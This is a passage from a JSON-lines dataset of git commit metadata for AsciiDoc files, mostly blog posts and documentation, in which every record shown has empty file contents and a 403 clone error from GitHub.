id\n","repos":"dieface\/promises-book,genie88\/promises-book,purepennons\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,azu\/promises-book,azu\/promises-book,oToUC\/promises-book,xifeiwu\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,cqricky\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,charlenopires\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,sunfurong\/promise,genie88\/promises-book,mzbac\/promises-book,liubin\/promises-book,liubin\/promises-book,wenber\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,genie88\/promises-book,azu\/promises-book,azu\/promises-book,charlenopires\/promises-book,oToUC\/promises-book,cqricky\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book","old_file":"Ch3_Testing\/control_tests.adoc","new_file":"Ch3_Testing\/control_tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48b532618903b8d59a04e79d8d4cf509139c2134","subject":"Update 2015-10-06-Scala-Basics.adoc","message":"Update 2015-10-06-Scala-Basics.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-06-Scala-Basics.adoc","new_file":"_posts\/2015-10-06-Scala-Basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1af02731841c87589a13a848be930acd1c41d035","subject":"Update 2016-06-22-Another-Post.adoc","message":"Update 2016-06-22-Another-Post.adoc","repos":"arabindamoni\/hubpress.io,arabindamoni\/hubpress.io,arabindamoni\/hubpress.io,arabindamoni\/hubpress.io","old_file":"_posts\/2016-06-22-Another-Post.adoc","new_file":"_posts\/2016-06-22-Another-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arabindamoni\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5efc8406ee39470304e3c4c3f584e0b5a2e56026","subject":"Update 2016-11-14-20161113.adoc","message":"Update 2016-11-14-20161113.adoc","repos":"zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io","old_file":"_posts\/2016-11-14-20161113.adoc","new_file":"_posts\/2016-11-14-20161113.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zhuo2015\/zhuo2015.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef809141a804f30ad08b60b22e9cdb75f7fe5817","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57d13665947100aeadfc45ed3e377a06c335cbe1","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ee3e272b11d41e33caaa7c2e4292214161ab52f","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cc395b84281c230d8a73ca2510a722259db25a1","subject":"Update 2017-01-01-7-Li7W-Ruby.adoc","message":"Update 2017-01-01-7-Li7W-Ruby.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-01-01-7-Li7W-Ruby.adoc","new_file":"_posts\/2017-01-01-7-Li7W-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e34054d5d58e95fe508233783f484879e4ec5725","subject":"Update 2019-03-22-A-W-S-C-L-I.adoc","message":"Update 2019-03-22-A-W-S-C-L-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f7b5a2b7f2320f6756efa6a458a8b517e796726","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f360a44c7d3b4d3139e4842e5d475af73a40a1ca","subject":"Deleted 2017-02-25adoc.adoc","message":"Deleted 2017-02-25adoc.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"2017-02-25adoc.adoc","new_file":"2017-02-25adoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af35b3f52967ab780c481deaef2fc7fac8697ed8","subject":"Update 2018-06-25-quick-rebel.adoc","message":"Update 2018-06-25-quick-rebel.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-06-25-quick-rebel.adoc","new_file":"_posts\/2018-06-25-quick-rebel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"500d2b5ff2c7e72fcf9b5166134ef627eddcfddd","subject":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","message":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da53b1471ea7cbd088426bfcf4870b78a2277a3d","subject":"renaming and cleaning up","message":"renaming and cleaning up\n","repos":"redhat-developer-demos\/docker-java,redhat-developer-demos\/docker-java","old_file":"chapters\/docker-ticket-monster.adoc","new_file":"chapters\/docker-ticket-monster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-developer-demos\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57a27155a132d4d798e1170600b254c8333dca49","subject":"Update 2015-03-24-Welcome.adoc","message":"Update 2015-03-24-Welcome.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-03-24-Welcome.adoc","new_file":"_posts\/2015-03-24-Welcome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51ccc3afaace37dc6378578ce44561ad1765da76","subject":"Job: 12021","message":"Job: 12021\n\nInitial analysis for early review","repos":"xtuml\/mc,leviathan747\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,leviathan747\/mc,cortlandstarrett\/mc,rmulvey\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,xtuml\/mc,leviathan747\/mc,xtuml\/mc,rmulvey\/mc,rmulvey\/mc,xtuml\/mc,cortlandstarrett\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,xtuml\/mc,cortlandstarrett\/mc,leviathan747\/mc","old_file":"doc\/notes\/12021_runtime_model_integration\/12021_runtime_model_integration.ant.adoc","new_file":"doc\/notes\/12021_runtime_model_integration\/12021_runtime_model_integration.ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ee98d97536dda68f76b303370da8c6d221a865b","subject":"Adding release notes for release of coverage revapi revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin","message":"Adding release notes for release of coverage revapi revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210430-bugfixes.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210430-bugfixes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f5c0de773e9faf8a06d8c55f39974a80d5ba32d","subject":"Update 2017-11-19-Sony-WH-1000X-M-Review.adoc","message":"Update 2017-11-19-Sony-WH-1000X-M-Review.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-19-Sony-WH-1000X-M-Review.adoc","new_file":"_posts\/2017-11-19-Sony-WH-1000X-M-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9041ab05b4e0ffafd093e13039c17257c325641","subject":"Initial blog post for release","message":"Initial blog post for release\n","repos":"liveoak-io\/liveoak.io,liveoak-io\/liveoak.io,liveoak-io\/liveoak.io","old_file":"blog\/2014-08-29-1_0_0_alpha02.adoc","new_file":"blog\/2014-08-29-1_0_0_alpha02.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liveoak-io\/liveoak.io.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"27845330b96a4ed52b953c9b5860b458e02ed598","subject":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-29-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3928c0045dd0b91186c0118796ba02cc128be4a","subject":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","message":"Update 2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_file":"_posts\/2017-05-03-Series-that-I-want-to-hack-my-complicated-work-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc88841163b797e8ab78af811b7d3804cadf2e0f","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d0f2506140e9559da2cf93c4b34349e7b8d6ac9","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/reclojure.adoc","new_file":"content\/events\/2022\/reclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3b1e143c8eb2437d41766d7bfd577cd577271ee0","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/06\/02\/deref.adoc","new_file":"content\/news\/2022\/06\/02\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"66067cf693625f334f7451037240a74a0a53ec14","subject":"Added README.asciidoc for parser-xml","message":"Added README.asciidoc for parser-xml","repos":"jerr\/jbossforge-core,forge\/core,forge\/core,oscerd\/core,agoncal\/core,D9110\/core,ivannov\/core,stalep\/forge-core,D9110\/core,oscerd\/core,D9110\/core,ivannov\/core,jerr\/jbossforge-core,pplatek\/core,oscerd\/core,forge\/core,jerr\/jbossforge-core,D9110\/core,ivannov\/core,jerr\/jbossforge-core,D9110\/core,D9110\/core,ivannov\/core,stalep\/forge-core,agoncal\/core,oscerd\/core,ivannov\/core,jerr\/jbossforge-core,D9110\/core,ivannov\/core,pplatek\/core,ivannov\/core,forge\/core,agoncal\/core,pplatek\/core,D9110\/core,pplatek\/core,agoncal\/core,agoncal\/core,agoncal\/core,pplatek\/core,pplatek\/core,oscerd\/core,forge\/core,forge\/core,pplatek\/core,D9110\/core,forge\/core,agoncal\/core,oscerd\/core,pplatek\/core,pplatek\/core,forge\/core,oscerd\/core,D9110\/core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,jerr\/jbossforge-core,oscerd\/core,agoncal\/core,oscerd\/core,forge\/core,ivannov\/core,agoncal\/core,ivannov\/core,jerr\/jbossforge-core,oscerd\/core,agoncal\/core,ivannov\/core,jerr\/jbossforge-core,pplatek\/core","old_file":"parser-xml\/README.asciidoc","new_file":"parser-xml\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivannov\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3e07277230f71a880cf0aa07fd32a1f2d6811abb","subject":"Update 2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","message":"Update 2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3912805c4d597176028fabc4f635adabcbe63c0a","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/09\/03\/deref.adoc","new_file":"content\/news\/2021\/09\/03\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"81580d6d27df616709453e526cfe6fa32a468a81","subject":"y2b create post Bluetooth + Hot shower = ?","message":"y2b create post Bluetooth + Hot shower = ?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-22-Bluetooth--Hot-shower--.adoc","new_file":"_posts\/2013-06-22-Bluetooth--Hot-shower--.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc4784f6e8a9a91954cb50871494f24960912000","subject":"Forge 3.1.0.Final announcement","message":"Forge 3.1.0.Final announcement\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-04-15-forge-3.1.0.final.asciidoc","new_file":"news\/2016-04-15-forge-3.1.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f61535f3c708b7dc46dbbddfacd0fa2a486ddfb9","subject":"y2b create post Bioshock Infinite Premium Edition Unboxing \\u0026 Overview","message":"y2b create post Bioshock Infinite Premium Edition Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-26-Bioshock-Infinite-Premium-Edition-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-03-26-Bioshock-Infinite-Premium-Edition-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dacaef09816322a1dbf5790f8a38c194806f7b0d","subject":"Update 2015-05-23-Hello-World.adoc","message":"Update 2015-05-23-Hello-World.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-05-23-Hello-World.adoc","new_file":"_posts\/2015-05-23-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ce0972271b331795c55df47e69a511396537914","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e54ab7c8e9abac11c2b733073694d9e2da14df02","subject":"Update 2016-07-22-Mo-te-passa.adoc","message":"Update 2016-07-22-Mo-te-passa.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-Mo-te-passa.adoc","new_file":"_posts\/2016-07-22-Mo-te-passa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6b9fc72ef9fcf24c26018eb9a8af19b86307880","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c47434431936bb176f7937f1afc227732757d5fe","subject":"doc: users-guide: add packet marking documentation","message":"doc: users-guide: add packet marking documentation\n\nUpdates packet marking api documentation to traffic manager user guide\n\nSigned-off-by: Balasubramanian Manoharan <affd9aba178b6c6e9aaff69252817fd03d71ae35@linaro.org>\nReviewed-and-tested-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"dkrot\/odp,ravineet-singh\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,nmorey\/odp,nmorey\/odp,nmorey\/odp,dkrot\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,nmorey\/odp,dkrot\/odp,erachmi\/odp,dkrot\/odp,erachmi\/odp,erachmi\/odp,mike-holmes-linaro\/odp","old_file":"doc\/users-guide\/users-guide-tm.adoc","new_file":"doc\/users-guide\/users-guide-tm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"0c610afc9d3c6ac312afdc393b4f82cef517fc35","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef26a9268a0b04b68e5407226d629546978f69eb","subject":"y2b create post GTA V Collector's Edition Unboxing + Special Edition Unboxing!","message":"y2b create post GTA V Collector's Edition Unboxing + Special Edition Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-17-GTA-V-Collectors-Edition-Unboxing--Special-Edition-Unboxing.adoc","new_file":"_posts\/2013-09-17-GTA-V-Collectors-Edition-Unboxing--Special-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf96bc3d05efa196a7e34ed9e41aa05eeb696fd9","subject":"URL prec","message":"URL prec\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8b44a3b76e34f485a9d3ef8d943691621b4ae3a","subject":"Update 2016-02-15-Just-some-pictures-of-the-RaspberryPi-Cluster-setup.adoc","message":"Update 2016-02-15-Just-some-pictures-of-the-RaspberryPi-Cluster-setup.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-02-15-Just-some-pictures-of-the-RaspberryPi-Cluster-setup.adoc","new_file":"_posts\/2016-02-15-Just-some-pictures-of-the-RaspberryPi-Cluster-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5106ef093c6b7d841bb581a27329f2c30e95859a","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud-incubator\/spring-cloud-kubernetes","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-incubator\/spring-cloud-kubernetes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b21fdfe8c638ee15a9dd1723037a440c3275b54b","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-aws","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-aws.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7965ed397e0464911fa7046c7134516a2dd736d","subject":"Update 2019-03-22-A-W-S-C-L-I.adoc","message":"Update 2019-03-22-A-W-S-C-L-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_file":"_posts\/2019-03-22-A-W-S-C-L-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28000e1c034e014557d3bd45fc06de4c45ba7cb4","subject":"Update 